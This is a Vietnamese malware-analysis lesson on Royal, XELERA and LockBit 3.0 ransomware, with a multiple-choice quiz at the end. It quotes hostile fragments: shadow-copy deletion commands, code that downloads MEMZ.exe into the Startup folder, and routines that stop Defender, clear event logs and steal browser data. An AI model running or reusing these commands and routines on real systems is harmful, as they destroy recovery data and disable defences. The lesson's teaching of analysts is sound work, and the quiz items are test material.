Bài 9: PHÂN TÍCH MÃ ĐỘC RANSOMWARE

1. Phân tích Royal Ransomware

Tổng quan

Royal Ransomware là một nhóm ransomware được phát hiện lần đầu vào đầu năm 2022. Ban đầu nhóm này sử dụng ransomware của bên thứ ba như BlackCat và Zeon tùy chỉnh. Từ tháng 9/2022, nhóm bắt đầu dùng ransomware riêng của mình. Đến tháng 11/2022, Royal được báo cáo là ransomware phổ biến nhất trong giới tội phạm mạng, vượt qua LockBit lần đầu tiên sau hơn một năm.

Thiết lập Ransomware

Khi thực thi, Royal Ransomware nhận tối đa 3 tham số dòng lệnh:

royal.exe -path [optional] -ep [optional] -id <32-digit-array>

Tham số	Bắt buộc	Mô tả
`-path`	Không	Đường dẫn thư mục cần mã hóa
`-ep`	Không	Phần trăm file sẽ bị mã hóa (1-100)
`-id`	Có	Mảng 32 ký tự định danh nạn nhân

Luồng xử lý tổng quan

flowchart TD A[Khởi động] --> B{Có tham số -id?} B -- Không --> C[Thoát] B -- Có --> D[Xóa Shadow Copy] D --> E[Thiết lập danh sách loại trừ file/thư mục] E --> F{Có tham số -path?} F -- Có --> G[Mã hóa đường dẫn chỉ định] F -- Không --> H[Quét mạng tìm tài nguyên chia sẻ] H --> G G --> I[Ghi Ransom Note README.TXT]

Xóa Shadow Copy

Sau khi xác thực dòng lệnh, ransomware lập tức xóa các bản sao lưu shadow copy để ngăn nạn nhân khôi phục dữ liệu:

wsprintfW(CommandLine, "delete shadows /all /quiet");
CreateProcess("C:\\Windows\\System32\\vssadmin.exe", CommandLine, ...);

Lệnh thực thi: vssadmin.exe delete shadows /all /quiet

Danh sách loại trừ

File extensions bị loại trừ (không mã hóa):

.exe  .dll  .bat  .lnk  README.TXT  .royal

Thư mục bị loại trừ (chứa các chuỗi sau):

Windows       Royal          Perflogs      Tor browser
Boot          $recycle.bin   Windows.old   $window.~ws
$windows.~bt  Mozilla        Google

Network Scanner

Khi không có tham số -path, ransomware sẽ quét mạng nội bộ:

flowchart LR A[GetIpAddrTable] --> B[Lọc IP bắt đầu bằng 192./10./100./172.] B --> C[WSASocketW + CreateIoCompletionPort] C --> D[htons 445 - SMB Port] D --> E[ConnectEx tới các IP] E --> F[NetShareEnum - liệt kê tài nguyên chia sẻ] F --> G{Là ADMIN$ hoặc IPC$?} G -- Có --> H[Bỏ qua] G -- Không --> I[Thêm vào danh sách mã hóa]

Chi tiết kỹ thuật:

Sử dụng GetIpAddrTable để lấy danh sách địa chỉ IP
Chỉ nhắm vào dải IP nội bộ: 192.x, 10.x, 100.x, 172.x
Kết nối qua cổng 445 (SMB) để tìm tài nguyên chia sẻ
Dùng NetShareEnum để liệt kê các share, bỏ qua ADMIN$ và IPC$

Encryption Thread

Tính số luồng mã hóa:

GetNativeSystemInfo(&SystemInfo);
numThreads = SystemInfo.dwNumberOfProcessors * 2;
// Tạo numThreads luồng mã hóa

Ransomware nhân đôi số lõi CPU để tạo luồng, tối đa hóa tốc độ mã hóa.

Thiết lập RSA Public Key:

Khóa RSA-2048 public được nhúng trực tiếp dưới dạng plaintext trong binary. Khóa này được dùng để mã hóa khóa AES ngẫu nhiên (được tạo cho mỗi file), đảm bảo chỉ kẻ tấn công mới có thể giải mã.

Windows Restart Manager:

Trước khi mã hóa, ransomware kiểm tra xem file mục tiêu có đang được ứng dụng nào mở không:

sequenceDiagram participant R as Ransomware participant W as Windows Restart Manager participant P as Processes R->>W: RmStartSession() R->>W: RmRegisterResources(file_targets) W->>R: RmGetList() - danh sách app đang dùng file R->>P: Loại trừ explorer.exe R->>P: RmShutDown() - kill các process còn lại R->>R: Tiến hành mã hóa

Quyết định tỷ lệ mã hóa

flowchart TD A[File mục tiêu] --> B{Kích thước < 5.245 MB?} B -- Có --> C[Mã hóa 100% file] B -- Không --> D{Có tham số -ep?} D -- -ep = 100 --> C D -- Không có -ep --> E[Mã hóa 50% file] D -- -ep = X% --> F[Mã hóa X% file]

Điều kiện	Kết quả
File < 5.245 MB	Mã hóa toàn bộ
File ≥ 5.245 MB, `-ep 100`	Mã hóa toàn bộ
File ≥ 5.245 MB, không có `-ep`	Mã hóa 50%
File ≥ 5.245 MB, `-ep X`	Mã hóa X%

Cấu trúc File Sau Mã Hóa

Sau khi mã hóa, Royal thêm 532 bytes vào cuối mỗi file:

[Nội dung file đã mã hóa] + [512 bytes: khóa AES ngẫu nhiên đã mã hóa bằng RSA] + [8 bytes: kích thước file gốc] + [8 bytes: giá trị -ep đã dùng]

Thuật toán: AES-256 (thư viện OpenSSL)

Quy trình:

ReadFile - đọc nội dung file
Mã hóa bằng AES-256
WriteFile + SetFilePointerEx - ghi dữ liệu đã mã hóa
MoveFileExW - đổi tên file, thêm đuôi .royal

Ghi Ransom Note

Đồng thời với quá trình mã hóa, một luồng riêng biệt thực hiện:

GetLogicalDrives - liệt kê tất cả ổ đĩa
Duyệt tất cả thư mục không nằm trong danh sách loại trừ
Tạo file README.TXT trong mỗi thư mục

Nội dung ransom note chứa link đến Tor onion site kèm ID nạn nhân:

http://royalzxthigbouShd7zsliqagybyygkZcdelaxtnizfyadgdpmpxedid.onion/<victim_id>

2. XELERA Ransomware Campaign

Tổng quan Chiến dịch

Ngày 18/01/2025, đội nghiên cứu Seqrite phát hiện tài liệu độc hại trên VirusTotal. File mồi nhử là FCEI-job-notification.doc, giả mạo thông báo tuyển dụng của Food Corporation of India (FCI), nhắm vào ứng viên kỹ sư và các vị trí kỹ thuật.

flowchart LR A[Spear Phishing Email] --> B[FCEI-job-notification.doc] B --> C[OLE Object kích hoạt] C --> D[jobnotification2025.exe\nPyInstaller binary] D --> E[Python Stealer\nBrowser credentials] D --> F[XELERA Ransomware\nMBR Corruption] D --> G[Discord C2 Server\nEmoji-based commands] F --> H[memz.exe\nMBR Overwrite]

Giai đoạn 1: Tài liệu Độc Hại

Tài liệu Word chứa một OLE object (Ole10Native) được nhúng bên trong cấu trúc ObjectPool, kích thước 31.5 MB.

oledump.py FCEI-job-notification.doc
# Stream 7: ObjectPool/_1797327314/Ole10Native (31.527.394 bytes)

Sau khi trích xuất, file là một PE64 binary - PyInstaller executable đã nén.

Giai đoạn 2: PyInstaller Executable

Giải nén bằng pyinstxtractor, thu được các file quan trọng:

mainscript.pyc          # Script Python chính
notoken887/             # Module mã hóa token
command/
  admin_command.pyc
  clean_command.pyc
  close_command.pyc
  filecommands/
  gdicommands/
  fun/
psutil/                 # Theo dõi process
aiohttp/                # Async HTTP
asyncio/                # Async I/O - dùng cho C2
Crypto/                 # Mã hóa

Giai đoạn 3: Python Scripts & Discord C2

# Import chính trong mainscript.py
from notoken887.encryptor import TokenCryptor
import discord
from discord.ext import commands
from command import ip_command, help_command, close_command, admin_command
from command.media import playsound_command, screenshot_command, tts
from command.useful import search_command, reload_command
from command.troll import nomouse_command, thugbom
from command.gdicommands import tornado_command, ultraseizure_command

Kẻ tấn công dùng Discord làm kênh C2 (Command & Control). Các lệnh được gửi qua Discord bot bằng emoji.

Tính năng Discord Bot

admin        - Yêu cầu chạy với quyền Administrator
lockpc       - Khóa màn hình
shutdown     - Tắt máy
restartpc    - Khởi động lại

cd <dir>     - Duyệt thư mục
steal <path> - Đánh cắp file (tối đa 10MB)
filetree     - Liệt kê cây thư mục
share        - Upload file

blur         - Làm mờ màn hình
tornado      - Hiệu ứng GDI xoáy
ultraseizure - Hiệu ứng nhấp nháy cực mạnh
nomouse      - Vô hiệu hóa chuột
notifspam    - Spam thông báo

search       - Tìm kiếm web
open         - Mở website

Leo thang Đặc quyền

def is_admin():
    try:
        return ctypes.windll.shell32.IsUserAnAdmin()
    except:
        return False

async def admin_command(ctx):
    if is_admin():
        await ctx.send('The script is already running as Administrator')
    else:
        # Dùng ShellExecuteW với "runas" để yêu cầu UAC
        ctypes.windll.shell32.ShellExecuteW(
            None, "runas", sys.executable, " ".join(sys.argv), None, 1
        )

Tính năng Ransomware XELERA

Hàm warning() khởi chạy 6 luồng song song:

flowchart TD W[warning function] --> T1[kill_explorer\nKill Explorer.exe liên tục] W --> T2[rename_windows\nĐổi tên tất cả cửa sổ] W --> T3[process_desktop\nXóa Desktop + spam ảnh] W --> T4[change_wallpaper\nĐổi hình nền] W --> T5[memz\nChạy MBR Corrupter] W --> T6[Hiển thị màn hình\ntống tiền Pygame]

Màn hình tống tiền hiển thị:

Địa chỉ Litecoin để thanh toán
Đếm ngược thời gian
Thông báo file đã bị mã hóa bằng “256-bit Military Grade Encryption”

MBR Corruption (MEMZ.exe)

create_memz_in_startup() tải MEMZ.exe từ GitHub về thư mục Startup:

url = "https://github.com/Sam-cpuggg/stuff/raw/main/MEMZ.exe"
startup_folder = os.path.join(os.getenv('APPDATA'),
    'Microsoft\\Windows\\Start Menu\\Programs\\Startup')

MEMZ.exe hoạt động như sau:

sequenceDiagram participant M as MEMZ.exe participant D as PhysicalDrive0 participant F as Filesystem M->>M: Parse args - kích hoạt /watchdog mode M->>M: Tạo watchdog thread - ngăn bị kill M->>D: CreateFileA("\\\\.\\PhysicalDrive0") M->>M: Chuẩn bị 64KB payload độc hại M->>D: WriteFile - ghi đè MBR M->>F: Tạo note.txt F->>F: ShellExecute notepad note.txt

Nội dung note.txt:

YOUR COMPUTER HAS BEEN INFECTED BY THE MEMZ TROJAN.
Your computer won't boot up again, so use it as long as you can!
Trying to kill MEMZ will cause your system to be destroyed instantly so don't try it :D

Browser Credential Stealing

async def getbrowserhistory(ctx):
    def fetch_chrome_history():
        app_data_path = os.getenv('LOCALAPPDATA')
        history_db = os.path.join(app_data_path,
            'Google\\Chrome\\User Data\\Default\\History')
        return fetch_browser_history(history_db, 'Chrome')

    def fetch_edge_history():
        history_db = os.path.join(app_data_path,
            'Microsoft\\Edge\\User Data\\Default\\History')
        return fetch_browser_history(history_db, 'Edge')

Đánh cắp: lịch sử duyệt web, cookies, username/password từ Chrome, Edge và các trình duyệt khác.

3. LockBit 3.0 (LockBit Black)

Tổng quan

LockBit 3.0 (còn gọi là LockBit Black) xuất hiện từ tháng 7/2022, trở thành một trong những ransomware nguy hiểm nhất thế giới. Nhiều công ty bán dẫn tại Đài Loan là nạn nhân nổi bật.

Luồng thực thi 4 giai đoạn

flowchart LR A[start] --> B[UnpackSections\nGiải mã các section] B --> C[ParseApiHashTable\nXây dựng lại IAT] C --> D[EscalatePrivilege\nLeo thang đặc quyền] D --> E[RansomMain\nThực hiện tống tiền] E --> F[ExitProcess]

// Entry point của LockBit 3.0
start:
    call UnpackSections_41B000    // Giai đoạn 1
    call ParseApiHashTable_408254 // Giai đoạn 2
    call EscalatePrivilege_408804 // Giai đoạn 3
    call RansomMain_41BF78        // Giai đoạn 4
    push uExitCode
    call ExitProcess

Giai đoạn 1: Giải mã Section (T1140)

LockBit 3.0 yêu cầu mật khẩu dòng lệnh để giải mã phần .itext (text section thực sự):

char sub_41B000() {
    WORD *CommandLine = GetCommandLine();
    sub_41B248(CommandLine, pass_val);   // Parse mật khẩu
    sub_41B2F4(vll, pass_val);           // Xử lý mật khẩu
    Rc4Ksa(vll, v12);                    // RC4 Key Schedule
    // Giải mã text section bằng RC4
    DecryptTextSegment(ImageBaseAddress, v9, v10);
}

Nếu không có mật khẩu đúng, ransomware không thể thực thi - đây là biện pháp chống phân tích hiệu quả.

Giai đoạn 2: Dynamic API Resolution (T1027.007)

Thay vì import API trực tiếp (dễ bị phát hiện), LockBit 3.0 dùng kỹ thuật phức tạp 3 bước:

flowchart TD A[Bước 1: Tìm DLL trong memory] --> B[So sánh hash tên DLL\nvới giá trị hardcoded] B --> C[Bước 2: Trích xuất địa chỉ API] C --> D[Parse InLoadOrderModuleList\nSo sánh hash tên API] D --> E[Bước 3: Tạo stub IAT] E --> F[Chọn ngẫu nhiên 1 trong 5 stub templates] F --> G[Mỗi stub dùng ROR/ROL + XOR\nđể che địa chỉ thật]

5 loại stub (ví dụ stub case 2):

case 2:
    DWORD(v4) = 0x4506DFCA;
    MOV eax, al ^ 0x4506DFCA;
    BYTE(v4) = 0x35;        // XOR opcode
    XOR eax, 0x4506DFCA;
    JMP eax;                // Nhảy tới API thật

Giai đoạn 2: Obfuscation Techniques (T1027)

A. String Hash Matching:

int str_hashing_401E4(WORD *a1, int a2) {
    do {
        LOWORD(v2) = *a1++;
        if (v2 >= 0x41 && v2 <= 0x5A)  // Hoa -> thường
            LOWORD(v2) += 0x20;
        a2 = v2 + ROR4(a2, 13);         // Rotate + cộng
    } while (v2);
    return a2;
}

Thay vì so sánh tên API trực tiếp, LockBit hash tên API và so sánh hash - khó reverse hơn.

B. Stack String Obfuscation:

void str_decrypt_401260(int *a1, int cnt) {
    do {
        *a1 ^= 0x4506DFCAu;  // XOR với key cố định
        a1++;
        cnt--;
    } while (cnt);
}

Chuỗi được lưu dưới dạng đã mã hóa trên stack, chỉ giải mã khi cần dùng.

Giai đoạn 3: Leo Thang Đặc Quyền

LockBit 3.0 sao chép access token của Trusted Installer Service - service có quyền dừng Windows Defender. Sau đó dùng token đó để:

Dừng các service của Windows Defender
Xóa Windows Defender

// Tìm và hash tên các service Defender
// UdBoot, UdFilter, UdNisDrv, UdNlisSvc, WinDefend, WscSvc, SppSvc, Sense, SecurityHealthService
OpenService(hSCManager, ~v0, FILE_TRAVERSE | DELETE);
ControlService(hSCObject, 3, &ServiceStatus);  // Stop
DeleteService(hSCObject);                       // Delete

Sử dụng kỹ thuật CMSTPLUA UAC Bypass để tự leo thang đặc quyền mà không cần hiển thị hộp thoại UAC cho người dùng.

Đặt registry autorun trong chế độ safeboot để đảm bảo ransomware chạy ngay cả khi nạn nhân boot vào Safe Mode.

Giai đoạn 4: RansomMain - Chi tiết

Kiểm tra ngôn ngữ hệ thống (T1614.001):

// Code từ BlackMatter/DarkSide
NtQueryInstallUiLanguage(&lang1);
NtQueryDefaultUiLanguage(&lang2);
// Nếu ngôn ngữ là CIS country -> thoát
// 0x419=Russian, 0x422=Ukrainian, 0x423=Belarusian, v.v.
if (language == RUSSIAN || language == UKRAINIAN || ...)
    ExitProcess(0);

Xóa Shadow Copy (T1490):

wmic shadowcopy delete

Dùng WMI thay vì vssadmin để tránh bị phát hiện.

Xóa Windows Event Log (T1070.001):

// Mở từng event log channel
OpenEventLogW(NULL, ChannelName);
ClearEventLogW(hEventLog, NULL);  // Xóa log
// Vô hiệu hóa channel
RegSetValueExW(Handle, L"Enabled", 4, &Data=0, 4);
// Dừng và xóa service EventLog
ControlService(hService, 1, &ServiceStatus);
DeleteService(hService);

Kill Processes & Services (T1489):

# Processes bị kill:
sql oracle ocssd dbsnmp synctime agntsvc isqlplussvc
firefox excel infopath msaccess mspub onenote outlook
powerpnt steam thunderbird visio winword wordpad notepad

# Services bị remove:
Vss sql svcS memtas mepocs msexchange sophos veeam
backup GxVss GxBlr GxFWD GxCVD GxCIMgr

Mã hóa đa luồng (T1486):

int EncryptFilesByMultithread() {
    CpuNum = GetCpuNum();
    if (CpuNum > 0x20) CpuNum = 32;  // Giới hạn 32 luồng
    CompletionPort = CreateIoCompletionPort(INVALID_HANDLE_VALUE, NULL, NULL, CpuNum);
    for (v5 = 0; v5 < CpuNum; v5++) {
        Thread = CreateThread(NULL, 0,
            EncryptFilesFromCompletionPort_40FCAC, NULL, 0, NULL);
        HideThreadFromDebugger(Thread);  // Anti-debug
    }
}

Cấu hình LockBit 3.0

LockBit 3.0 hỗ trợ cấu hình linh hoạt qua config file. Một số flag quan trọng:

Flag	Chức năng
`LB3_ENCRYPT_ANY_BIG_FILE`	Mã hóa file lớn
`LB3_RANDOMISE_FILENAME`	Ngẫu nhiên hóa tên file
`LB3_LANGUAGE_CHECK`	Kiểm tra ngôn ngữ CIS
`LB3_ENCRYPT_NETWORK_SHARES`	Mã hóa tài nguyên mạng
`LB3_KILL_PROCESSES`	Kill processes
`LB3_KILL_SERVICES`	Kill services
`LB3_SET_BACKGROUND`	Đổi hình nền
`LB3_REGISTER_ICON`	Thay icon file
`LB3_SELF_DESTRUCT`	Tự xóa sau khi chạy
`LB3_ATTEMPT_UAC_BYPASS`	Bypass UAC
`LB3_CLEAR_EVENT_LOGS`	Xóa Event Log

MITRE ATT&CK Mapping - LockBit 3.0

flowchart TD subgraph Execution T1106[T1106: Native API] T1047[T1047: WMI] end subgraph Persistence T1547[T1547.001: Registry Run Keys\nSafeboot mode] end subgraph PrivEsc T1134[T1134.001: Token Impersonation] T1548[T1548.002: Bypass UAC\nCMSTPLUA technique] end subgraph DefenseEvasion T1140[T1140: Deobfuscate/Decode\nPassword-protected sections] T1562[T1562.001: Disable Windows Defender] T1070[T1070.001: Clear Event Logs] T1027[T1027: Obfuscated Files\nStack string obfuscation] T1027b[T1027.007: Dynamic API Resolution\nHash-based IAT rebuild] T1622[T1622: Debugger Evasion] T1112[T1112: Modify Registry] end subgraph Discovery T1614[T1614.001: System Language Discovery] end subgraph LateralMovement T1570[T1570: Lateral Tool Transfer\nAdmin Shares, GPO] end subgraph Impact T1486[T1486: Data Encrypted for Impact] T1490[T1490: Inhibit System Recovery\nDelete Shadow Copies] T1489[T1489: Service Stop] end

Câu hỏi Ôn tập Trắc nghiệm

Câu 1. Royal Ransomware được phát hiện lần đầu vào thời gian nào?

A. Đầu năm 2021
B. Đầu năm 2022
C. Tháng 9/2022
D. Tháng 11/2022

Câu 2. Tham số bắt buộc khi chạy Royal Ransomware là gì?

A. -path
B. -ep
C. -id
D. -key

Câu 3. Royal Ransomware sử dụng lệnh nào để xóa shadow copy?

A. wbadmin delete backup
B. vssadmin delete shadows /all /quiet
C. bcdedit /set {default} recoveryenabled No
D. wmic shadowcopy delete

Câu 4. File extension nào KHÔNG bị Royal Ransomware loại trừ khỏi quá trình mã hóa?

A. .exe
B. .dll
C. .docx
D. .royal

Câu 5. Royal Ransomware tính số luồng mã hóa như thế nào?

A. Cố định 4 luồng
B. Bằng số lõi CPU
C. Số lõi CPU nhân 2
D. Số lõi CPU chia 2

Câu 6. Khi file có kích thước lớn hơn 5.245 MB và không có tham số -ep, Royal sẽ mã hóa bao nhiêu phần trăm file?

A. 100%
B. 75%
C. 50%
D. 25%

Câu 7. Royal Ransomware thêm bao nhiêu bytes vào cuối mỗi file đã mã hóa?

A. 256 bytes
B. 512 bytes
C. 532 bytes
D. 1024 bytes

Câu 8. Royal Ransomware dùng thuật toán mã hóa nào cho nội dung file?

A. RSA-2048
B. AES-256
C. ChaCha20
D. Salsa20

Câu 9. Sau khi mã hóa xong, Royal Ransomware đổi tên file bằng API nào?

A. RenameFile
B. SetFileAttributes
C. MoveFileExW
D. CreateFileW

Câu 10. Royal Ransomware ghi ransom note với tên file nào?

A. RANSOM_NOTE.txt
B. HOW_TO_DECRYPT.txt
C. README.TXT
D. ROYAL_NOTICE.txt

Câu 11. Royal Ransomware quét mạng tìm kiếm các địa chỉ IP nào?

A. Chỉ IP public
B. 192.x, 10.x, 100.x, 172.x
C. Toàn bộ dải IP
D. Chỉ IP trong cùng subnet

Câu 12. Royal Ransomware kết nối đến cổng nào khi quét tài nguyên chia sẻ mạng?

A. 80 (HTTP)
B. 443 (HTTPS)
C. 445 (SMB)
D. 3389 (RDP)

Câu 13. API nào Royal dùng để liệt kê tài nguyên chia sẻ mạng?

A. GetShareInfo
B. NetShareEnum
C. EnumNetResources
D. WNetEnumResource

Câu 14. Royal Ransomware bỏ qua những loại tài nguyên chia sẻ nào?

A. C$ và D$
B. ADMIN$ và IPC$
C. PRINT$ và FAX$
D. Không bỏ qua loại nào

Câu 15. Windows Restart Manager được sử dụng trong Royal Ransomware với mục đích gì?

A. Khởi động lại máy sau khi mã hóa
B. Kiểm tra và kill các process đang sử dụng file mục tiêu
C. Leo thang đặc quyền
D. Xóa shadow copy

Câu 16. XELERA Ransomware được phát hiện vào ngày nào?

A. 18/01/2024
B. 18/01/2025
C. 18/03/2025
D. 01/01/2025

Câu 17. File mồi nhử của XELERA Ransomware giả mạo tổ chức nào?

A. Infosys India
B. TCS (Tata Consultancy Services)
C. Food Corporation of India (FCI)
D. NASSCOM

Câu 18. XELERA Ransomware được đóng gói bằng công cụ gì?

A. cx_Freeze
B. Nuitka
C. PyInstaller
D. py2exe

Câu 19. OLE stream chứa payload độc hại trong tài liệu XELERA có kích thước bao nhiêu?

A. 1.5 MB
B. 15.5 MB
C. 31.5 MB
D. 63.5 MB

Câu 20. XELERA sử dụng kênh C2 (Command & Control) nào?

A. Telegram Bot
B. Discord Bot
C. IRC Channel
D. Custom HTTP Server

Câu 21. XELERA dùng API nào để kiểm tra quyền Administrator?

A. GetTokenInformation
B. CheckTokenMembership
C. IsUserAnAdmin
D. OpenProcessToken

Câu 22. Hàm kill_explorer trong XELERA hoạt động như thế nào?

A. Kill explorer.exe một lần duy nhất
B. Kill explorer.exe liên tục trong vòng lặp, trừ khi memz.exe đang chạy
C. Disable explorer.exe qua registry
D. Rename file explorer.exe

Câu 23. MEMZ.exe ghi đè vào phần nào của ổ đĩa để làm máy không thể boot?

A. Boot Sector của phân vùng C:
B. MBR (Master Boot Record) của PhysicalDrive0
C. GPT Header
D. UEFI firmware

Câu 24. XELERA Ransomware có thực sự mã hóa file bằng thuật toán mật mã không?

A. Có, dùng AES-256
B. Có, dùng RSA-2048
C. Không, không thực hiện mã hóa thật
D. Có, dùng ChaCha20

Câu 25. XELERA lưu MEMZ.exe vào thư mục nào để đảm bảo tự khởi động?

A. C:\Windows\System32
B. %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup
C. C:\ProgramData
D. %TEMP%

Câu 26. Hàm rename_windows trong XELERA làm gì?

A. Đổi tên user account của nạn nhân
B. Liên tục đổi tiêu đề tất cả cửa sổ thành thông điệp đòi tiền chuộc
C. Đổi tên máy tính (computer name)
D. Đổi tên các file trên desktop

Câu 27. XELERA sử dụng thư viện Python nào để giám sát và liệt kê process?

A. subprocess
B. os
C. psutil
D. win32api

Câu 28. LockBit 3.0 có tên gọi khác là gì?

A. LockBit Red
B. LockBit Black
C. LockBit Dark
D. LockBit Blue

Câu 29. LockBit 3.0 xuất hiện vào tháng nào?

A. Tháng 1/2022
B. Tháng 3/2022
C. Tháng 7/2022
D. Tháng 11/2022

Câu 30. LockBit 3.0 yêu cầu điều gì để giải mã text section?

A. Kết nối internet
B. Mật khẩu dòng lệnh
C. Khóa USB dongle
D. Kết nối đến C2 server

Câu 31. LockBit 3.0 dùng thuật toán gì để schedule key cho RC4?

A. Rc4Ksa (Key Scheduling Algorithm)
B. AES key expansion
C. PBKDF2
D. bcrypt

Câu 32. LockBit 3.0 tái tạo Import Address Table (IAT) bằng cách nào?

A. Đọc trực tiếp từ PE header
B. Hash-based API resolution với stub ngẫu nhiên
C. Hardcode tất cả địa chỉ API
D. Dùng GetProcAddress trực tiếp

Câu 33. Trong kỹ thuật string obfuscation của LockBit 3.0, XOR key được sử dụng là gì?

A. 0xDEADBEEF
B. 0x4506DFCA
C. 0xCAFEBABE
D. 0x13371337

Câu 34. LockBit 3.0 kiểm tra ngôn ngữ hệ thống để làm gì?

A. Hiển thị ransom note bằng ngôn ngữ phù hợp
B. Thoát nếu hệ thống dùng ngôn ngữ CIS (Nga, Ukraine, v.v.)
C. Chọn server C2 phù hợp địa lý
D. Điều chỉnh giá tiền chuộc

Câu 35. LockBit 3.0 vô hiệu hóa Windows Defender bằng cách nào?

A. Xóa file thực thi của Defender
B. Dùng token của Trusted Installer Service để stop và delete Defender services
C. Sửa registry để disable Defender
D. Dùng PowerShell Set-MpPreference -DisableRealtimeMonitoring $true

Câu 36. LockBit 3.0 xóa shadow copy bằng phương pháp nào?

A. vssadmin delete shadows /all /quiet
B. WMI interface
C. PowerShell Remove-WmiObject
D. Trực tiếp xóa file VSS

Câu 37. LockBit 3.0 xóa Windows Event Log bằng API nào?

A. DeleteEventLog
B. ClearEventLogW
C. PurgeEventLog
D. WipeEventLog

Câu 38. LockBit 3.0 tạo bao nhiêu luồng mã hóa tối đa?

A. 16
B. 24
C. 32
D. 64

Câu 39. LockBit 3.0 lưu icon và wallpaper vào thư mục nào?

A. %TEMP%
B. C:\Windows\System32
C. C:\ProgramData
D. %APPDATA%

Câu 40. Kỹ thuật UAC Bypass nào LockBit 3.0 sử dụng?

A. fodhelper.exe bypass
B. eventvwr.exe bypass
C. CMSTPLUA bypass
D. DiskCleanup bypass

Câu 41. Kỹ thuật persistence nào LockBit 3.0 dùng để chạy trong Safe Mode?

A. Scheduled Task
B. Service installation
C. Registry Run Keys trong safeboot mode
D. DLL hijacking

Câu 42. Ransomware nào trong ba loại được phân tích KHÔNG sử dụng mô hình RaaS?

A. LockBit 3.0
B. Royal
C. XELERA
D. Cả A và C

Câu 43. Điểm tương đồng kỹ thuật quan trọng nhất giữa LockBit 3.0 và BlackMatter/DarkSide là gì?

A. Dùng cùng mã hóa file
B. Entry point code và ParseApiHashTable function giống nhau
C. Dùng cùng ransom note
D. Dùng cùng C2 server

Câu 44. Trong LockBit 3.0, HideThreadFromDebugger được gọi sau khi tạo mỗi luồng mã hóa. Đây là kỹ thuật gì?

A. T1027 - Obfuscation
B. T1622 - Debugger Evasion
C. T1140 - Deobfuscation
D. T1134 - Token Impersonation

Câu 45. LockBit 3.0 di chuyển ngang (lateral movement) bằng cách nào?

A. Khai thác lỗ hổng EternalBlue
B. Qua Admin Shares hoặc Domain Group Policy
C. Qua RDP brute force
D. Qua phishing email

Câu 46. Ba ransomware nào được đề cập sử dụng Windows Restart Manager tương tự Royal?

A. LockBit, Ryuk, Maze
B. Conti, Babuk, LockBit
C. REvil, DarkSide, Hive
D. BlackCat, Cl0p, Hive

Câu 47. Trong quá trình phân tích XELERA, công cụ nào được dùng để phân tích OLE streams của file Word?

A. oletools
B. oledump.py
C. officeparser
D. maldoc

Câu 48. XELERA đánh cắp thông tin từ database file History của Chrome được lưu ở đâu?

A. %PROGRAMFILES%\Google\Chrome\...
B. %LOCALAPPDATA%\Google\Chrome\User Data\Default\History
C. %APPDATA%\Google\Chrome\...
D. %TEMP%\Chrome\...

Câu 49. Kỹ thuật hash matching trong LockBit 3.0 dùng phép toán nào để tính hash của API name?

A. MD5
B. SHA-1
C. CRC32
D. Custom: cộng ký tự (lowercase) + ROR 13 bit

Câu 50. Flag nào trong config LockBit 3.0 cho phép tự xóa sau khi chạy xong?

A. LB3_DELETE_SELF
B. LB3_SELF_DESTRUCT
C. LB3_AUTO_REMOVE
D. LB3_CLEANUP

Câu 51. Trong config LockBit 3.0, flag LB3_LANGUAGE_CHECK liên quan đến kỹ thuật MITRE nào?

A. T1057 - Process Discovery
B. T1614.001 - System Language Discovery
C. T1012 - Query Registry
D. T1082 - System Information Discovery

Câu 52. Điểm khác biệt cơ bản nhất giữa partial encryption của Royal và mã hóa thông thường là gì?

A. Dùng thuật toán khác
B. Chỉ mã hóa một tỷ lệ phần trăm linh hoạt của nội dung file, thay vì toàn bộ
C. Không thêm extension mới
D. Không ghi ransom note

Câu 53. Trong XELERA, thư viện notoken887 được dùng để làm gì?

A. Quản lý kết nối Discord
B. Mã hóa token/credentials
C. Quét process
D. Chụp screenshot

Câu 54. LockBit 3.0 dùng kỹ thuật gì để ẩn thread khỏi debugger?

A. SuspendThread
B. NtSetInformationThread với ThreadHideFromDebugger
C. DebugActiveProcessStop
D. NtQueryInformationProcess

Câu 55. Trong Royal Ransomware, API nào được dùng để lấy danh sách địa chỉ IP của các interface mạng?

A. GetAdaptersInfo
B. GetNetworkParams
C. GetIpAddrTable
D. GetAdaptersAddresses